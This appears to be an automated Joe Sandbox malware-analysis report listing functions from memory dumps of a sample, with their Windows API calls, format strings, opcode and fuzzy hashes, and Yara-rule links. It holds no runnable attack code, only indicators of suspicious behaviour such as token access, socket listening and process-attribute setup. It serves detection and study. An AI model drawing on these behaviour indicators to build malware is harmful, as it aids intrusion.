                            Function 00DBEF0C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _clock
                            • String ID:
                            • API String ID: 876827150-0
                            • Opcode ID: 908a800f1b4aee3d8470d56c238d3ac105f65cf764e8ae670c4fb01448cdafdd
                            • Instruction ID: fee67c81e16e2a67d04de1a16ab26c2a2a7b20c9047216918f643cb34448ddbf
                            • Opcode Fuzzy Hash: 908a800f1b4aee3d8470d56c238d3ac105f65cf764e8ae670c4fb01448cdafdd
                            • Instruction Fuzzy Hash: 93014C31D00619EFCB21DFE8D8C15EDBBB4EF14380B2581AAE442A7281D7309E41DBB0
                            Function 00D7E30C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _clock
                            • String ID:
                            • API String ID: 876827150-0
                            • Opcode ID: 908a800f1b4aee3d8470d56c238d3ac105f65cf764e8ae670c4fb01448cdafdd
                            • Instruction ID: 79e4380007ddd7984dba28ee8a5a7f87fe48280c849be567bcd41c4efdf13732
                            • Opcode Fuzzy Hash: 908a800f1b4aee3d8470d56c238d3ac105f65cf764e8ae670c4fb01448cdafdd
                            • Instruction Fuzzy Hash: 7D014C31D00719EFCF20DFE8D4C19ADBBB4EF15781B6481AAD445A7201E7309A81DBB0
                            Function 00DBDE47 Relevance: 6.0, APIs: 4, Instructions: 46sleepsynchronizationthreadCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00DB16C4), ref: 00DBDE84
                            • ExitThread.KERNEL32 ref: 00DBDE8E
                            • WaitForSingleObject.KERNEL32(00000000,00000000,00000080,00DB16C4), ref: 00DBDEAF
                            • ExitProcess.KERNEL32 ref: 00DBDEBB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exit$ObjectProcessSingleSleepThreadWait
                            • String ID:
                            • API String ID: 2040395460-0
                            • Opcode ID: 49705c9bca7a7cd5cc1d1c08578310b2031c6ce9b114f29d7b6529a950cdc545
                            • Instruction ID: 2876cd90a95047d5b4d81e68850d2c1ea23c43593e8fb4a50feef146659a4044
                            • Opcode Fuzzy Hash: 49705c9bca7a7cd5cc1d1c08578310b2031c6ce9b114f29d7b6529a950cdc545
                            • Instruction Fuzzy Hash: E0F0F6B6689314F6E9303BA5AC8AFDE3B09EB6073AF11011BF6679D1D1AF6188004035
                            Function 00DBE0A1 Relevance: 6.0, APIs: 4, Instructions: 42threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 00DBE0AE
                            • OpenThreadToken.ADVAPI32(00000000), ref: 00DBE0B5
                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 00DBE0C5
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00DBE0CC
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentOpenProcessThreadToken
                            • String ID:
                            • API String ID: 3974789173-0
                            • Opcode ID: b4c79614a3deed300639f034a198e084288aff15caf6bfb6a9d7d32a7efec50a
                            • Instruction ID: cb06a8580e2a4d6ec8b52d162c86a3a6f6d4394309aab0afc9a3e39a94d5ca6d
                            • Opcode Fuzzy Hash: b4c79614a3deed300639f034a198e084288aff15caf6bfb6a9d7d32a7efec50a
                            • Instruction Fuzzy Hash: 06F0F931601304FBDB20BBA5ED0ABEE37A9EB44759F144056F542DA1A2EFB1D9049670
                            Function 00DBED4F Relevance: 6.0, APIs: 4, Instructions: 40networkCOMMON
                            Download Yara Rule
                            APIs
                            • accept.WS2_32(?,00000000,00000000), ref: 00DBED5D
                            • send.WS2_32(00000000,?,?,00000000), ref: 00DBED8A
                            • send.WS2_32(00000000,?,?,00000000), ref: 00DBED98
                            • closesocket.WS2_32(00000000), ref: 00DBEDA3
                              • Part of subcall function 00DBECDF: closesocket.WS2_32(?), ref: 00DBECE1
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: closesocketsend$accept
                            • String ID:
                            • API String ID: 2168303407-0
                            • Opcode ID: 455cbe41ac762dc22f939011210d07897accc6f2b097a7136463c47ab3f6dbfc
                            • Instruction ID: ace3d95b17439fe1c9465d942fee6c48d8c5def130668a67ebdea1ad7c15b748
                            • Opcode Fuzzy Hash: 455cbe41ac762dc22f939011210d07897accc6f2b097a7136463c47ab3f6dbfc
                            • Instruction Fuzzy Hash: F5F09636100710FBD6203BB5AC42FC6BB6CEF04730F204A06F6575759386B2A80057B4
                            Function 00DB91E2 Relevance: 6.0, APIs: 4, Instructions: 39memorythreadCOMMON
                            Download Yara Rule
                            APIs
                            • InitializeProcThreadAttributeList.KERNEL32(00000000,00DB9286,00000000,00000000,?,?,?,?,?,00DB9286,00000000), ref: 00DB91FD
                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00DB9286,00000000), ref: 00DB9203
                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00DB9286,00000000), ref: 00DB920A
                            • InitializeProcThreadAttributeList.KERNEL32(00000000,00DB9286,00000000,00000000,?,?,?,?,00DB9286,00000000), ref: 00DB921F
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                            • String ID:
                            • API String ID: 1212816094-0
                            • Opcode ID: 31c8ffa911c7164bb425678fd5a0b7f780109b61ba28a077453137a1e8d1b684
                            • Instruction ID: 3798303c548fb0fe062a420031efde173769803fe0b5e921db0f502e91bd0cdd
                            • Opcode Fuzzy Hash: 31c8ffa911c7164bb425678fd5a0b7f780109b61ba28a077453137a1e8d1b684
                            • Instruction Fuzzy Hash: 12F05E7AA00248FB8B119BE6ED88CAF7FBCEAC9794754402AF602D2100D6319A00DB70
                            Function 00DB72B8 Relevance: 6.0, APIs: 4, Instructions: 35sleeppipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB72CA
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00DB72DE
                            • Sleep.KERNEL32(000001F4), ref: 00DB72F2
                            • GetTickCount.KERNEL32 ref: 00DB72F8
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTick$NamedPeekPipeSleep
                            • String ID:
                            • API String ID: 1593283408-0
                            • Opcode ID: bf3ea15852e3480be8520d3577941f3a29e2e10d845fd484f627ca3dd7929a46
                            • Instruction ID: 65852034d43131121edaa855b20f4af41bcda0276a161d00792d9ebe940bd7c3
                            • Opcode Fuzzy Hash: bf3ea15852e3480be8520d3577941f3a29e2e10d845fd484f627ca3dd7929a46
                            • Instruction Fuzzy Hash: 9DF0377190521DFFEB015F95DC848EFB7ADEB846A57254077F502D6110DA709D408A74
                            Function 00DD128A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 00DD1296
                              • Part of subcall function 00DCD797: __getptd_noexit.LIBCMT ref: 00DCD79A
                              • Part of subcall function 00DCD797: __amsg_exit.LIBCMT ref: 00DCD7A7
                            • __getptd.LIBCMT ref: 00DD12AD
                            • __amsg_exit.LIBCMT ref: 00DD12BB
                            • __lock.LIBCMT ref: 00DD12CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            • Opcode ID: bcbe2d9794e3fd23b0b87496da13d7eb541de55d45ec6cfab26493ae01bd346e
                            • Instruction ID: dd1cd08ed4462633ca4bc5f61a4b3de3dbd7fb246bdb7eada7e224ec8dc09257
                            • Opcode Fuzzy Hash: bcbe2d9794e3fd23b0b87496da13d7eb541de55d45ec6cfab26493ae01bd346e
                            • Instruction Fuzzy Hash: D4F06D36900B42EADB20BBA4A947B587BA0EF00724F24065FE445DB3C6CB799901CB76
                            Function 00D9068A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 00D90696
                              • Part of subcall function 00D8CB97: __getptd_noexit.LIBCMT ref: 00D8CB9A
                              • Part of subcall function 00D8CB97: __amsg_exit.LIBCMT ref: 00D8CBA7
                            • __getptd.LIBCMT ref: 00D906AD
                            • __amsg_exit.LIBCMT ref: 00D906BB
                            • __lock.LIBCMT ref: 00D906CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            • Opcode ID: 632a2da44d7129273f8f1a3f3d2bd9dc2f35d501a8d6ef1af36a422137bc2622
                            • Instruction ID: 85b2232560458d491c0a6df5e673d419ec71bdaff209db3bd0f4d4b98c98e216
                            • Opcode Fuzzy Hash: 632a2da44d7129273f8f1a3f3d2bd9dc2f35d501a8d6ef1af36a422137bc2622
                            • Instruction Fuzzy Hash: 50F09032900B10DFEB21FB7498067987BE0EF81721F14450AE144AB2E2CB74A811DB72
                            Function 00DBCF6B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset
                            • String ID: l.dl$ntdl
                            • API String ID: 2102423945-1236859653
                            • Opcode ID: 1fa81a2a2cbbb61675b1149e2676844100b29c6b66f61cbe1bcb22762e416b2a
                            • Instruction ID: 430cc3c9954f3ad181ab635fb52b0b66cffa0f9e6f994539fedf8f72b4816bd2
                            • Opcode Fuzzy Hash: 1fa81a2a2cbbb61675b1149e2676844100b29c6b66f61cbe1bcb22762e416b2a
                            • Instruction Fuzzy Hash: 05515D75901205DFCB20DF58C480AADBBF2FF48314F2980A9E945AB355D731EE82CBA4
                            Function 00D7C36B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset
                            • String ID: l.dl$ntdl
                            • API String ID: 2102423945-1236859653
                            • Opcode ID: fdb6297e7cbd8406269c93f82204456c1cf00d7e15b5db9edf4be9e089ab1587
                            • Instruction ID: 8fb77e13c791038ed7e6dbb1a49629a8c1a2bab7a47815dec39f3a39f86f126b
                            • Opcode Fuzzy Hash: fdb6297e7cbd8406269c93f82204456c1cf00d7e15b5db9edf4be9e089ab1587
                            • Instruction Fuzzy Hash: 87512875910615DFCB20CF98C480AADB7F1FF48314B19C4AAD949AB325E730AE81CBA0
                            Function 00DBC072 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf
                            • String ID: %c%c%c%c
                            • API String ID: 2633826957-103593547
                            • Opcode ID: b6c9ebb6385709b0fae9e36a6cbab84592eb7472c13c8edab1dea5043827d99a
                            • Instruction ID: f9859b66a8787ef9b034cf8b62d0239259500753bd6b344b7a7aa2519215fe81
                            • Opcode Fuzzy Hash: b6c9ebb6385709b0fae9e36a6cbab84592eb7472c13c8edab1dea5043827d99a
                            • Instruction Fuzzy Hash: 17F0C27590024AADCB01EBE4889AEFEBFBC8B04301F040181EA50E3042EA75D34D8BB1
                            Function 00DB504D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DB5058
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • __snprintf.LIBCMT ref: 00DB506C
                              • Part of subcall function 00DC9D8A: RemoveDirectoryA.KERNEL32(00DB5080,?,00DB5080,00000000), ref: 00DC9D92
                              • Part of subcall function 00DC9D8A: GetLastError.KERNEL32(?,00DB5080,00000000), ref: 00DC9D9C
                              • Part of subcall function 00DC9D8A: __dosmaperr.LIBCMT ref: 00DC9DAB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateDirectoryErrorHeapLastRemove__dosmaperr__snprintf_malloc
                            • String ID: %s\%s
                            • API String ID: 47932920-4073750446
                            • Opcode ID: 7e76d8248e97c1afc42238983ab536253f04fe6e8a413937a81cad01264b9600
                            • Instruction ID: 0c25efab407ed5614d6c8c8ac1dd93881ea32cde9e82314f9b2c6245276a9d71
                            • Opcode Fuzzy Hash: 7e76d8248e97c1afc42238983ab536253f04fe6e8a413937a81cad01264b9600
                            • Instruction Fuzzy Hash: EBE02032000106BAC6123555EC06FFFB75CCF82770F24006EF909220466E715D0155FB
                            Function 00DB982A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf_memset
                            • String ID: %s%s: %s
                            • API String ID: 2657849664-533130479
                            • Opcode ID: 28b40d27e69297c3f1e193374f74d5cbdb0b4ea37a854bf1121545a2ca90eb92
                            • Instruction ID: 8419f2a4c50df5ea4ca3e398e93d2fb3919e74ba85fb1ae1c026c783eb63bba7
                            • Opcode Fuzzy Hash: 28b40d27e69297c3f1e193374f74d5cbdb0b4ea37a854bf1121545a2ca90eb92
                            • Instruction Fuzzy Hash: 7CF0A072104204EBCB019E90CCC1F8B7779EF89B10F100015FA416B156D631E915DB32
                            Function 00DBA6D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DBA6DC
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • __snprintf.LIBCMT ref: 00DBA6F0
                              • Part of subcall function 00DBA70E: _malloc.LIBCMT ref: 00DBA71B
                              • Part of subcall function 00DBA70E: __snprintf.LIBCMT ref: 00DBA72C
                              • Part of subcall function 00DBA70E: FindFirstFileA.KERNEL32(00000000,00DB50C9,?,00DBA7FD,00DB50C9,?,Function_0000504D), ref: 00DBA739
                              • Part of subcall function 00DBA70E: _malloc.LIBCMT ref: 00DBA778
                              • Part of subcall function 00DBA70E: __snprintf.LIBCMT ref: 00DBA78D
                              • Part of subcall function 00DBA70E: FindNextFileA.KERNEL32(000000FF,00DB50C9,?,?,?,?,?,?,?), ref: 00DBA7BA
                              • Part of subcall function 00DBA70E: FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 00DBA7C7
                              • Part of subcall function 00DC8722: __lock.LIBCMT ref: 00DC8740
                              • Part of subcall function 00DC8722: ___sbh_find_block.LIBCMT ref: 00DC874B
                              • Part of subcall function 00DC8722: ___sbh_free_block.LIBCMT ref: 00DC875A
                              • Part of subcall function 00DC8722: HeapFree.KERNEL32(00000000,00000000,00DE35A0,0000000C,00DCD788,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C), ref: 00DC878A
                              • Part of subcall function 00DC8722: GetLastError.KERNEL32(?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5,00000000,00000000,?,00DCD842,0000000D), ref: 00DC879B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                            • String ID: %s\%s
                            • API String ID: 1254174322-4073750446
                            • Opcode ID: 95564960c49ecd6d85fb663c31546af88b0a462c47f4c437eddf77543d966d84
                            • Instruction ID: 9f4dac9b09864aa33ad8c562bb7c7fe0e8e67eb25d2859e78034905dafc05504
                            • Opcode Fuzzy Hash: 95564960c49ecd6d85fb663c31546af88b0a462c47f4c437eddf77543d966d84
                            • Instruction Fuzzy Hash: 68E08C3250001A778B123E569C42EFFBB2DEF866A0B000029FE08221519E36892167B6
                            Function 00DB993D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf_memset
                            • String ID: %s%s
                            • API String ID: 2657849664-3438391663
                            • Opcode ID: f6eae6f126bdd21378e563c580daa8b7f8fb51e09ac65428d5c0df42ea5455cb
                            • Instruction ID: 5ab638af0602c076745d5daeb7182cd23396bf8ca6e3cd3fc9694e848d2e89b3
                            • Opcode Fuzzy Hash: f6eae6f126bdd21378e563c580daa8b7f8fb51e09ac65428d5c0df42ea5455cb
                            • Instruction Fuzzy Hash: 7BE01276104344BBC711AE61DCC6F9FB7BCEF8AB00F404629B6459A156EA31D914DB32
                            Function 004022C0 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022CE
                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022F5
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 004022FC
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040248B,?,?,?,?,?,00401B28), ref: 0040231C
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterErrorLastLeaveValue
                            • String ID:
                            • API String ID: 682475483-0
                            • Opcode ID: 3e49c145e7cda86df6080b1c3b5656d3cc1d329760b6f4bb8e53dbee9a39bf48
                            • Instruction ID: db0b3c927cb9be537e2116d15c0f7f13df8c87252735a744e9a29fbe81bf0797
                            • Opcode Fuzzy Hash: 3e49c145e7cda86df6080b1c3b5656d3cc1d329760b6f4bb8e53dbee9a39bf48
                            • Instruction Fuzzy Hash: BAF0A4756007108BC7107FB8D9C861B7BA4AA48345B0505B9DE845735AE778EC08CBAA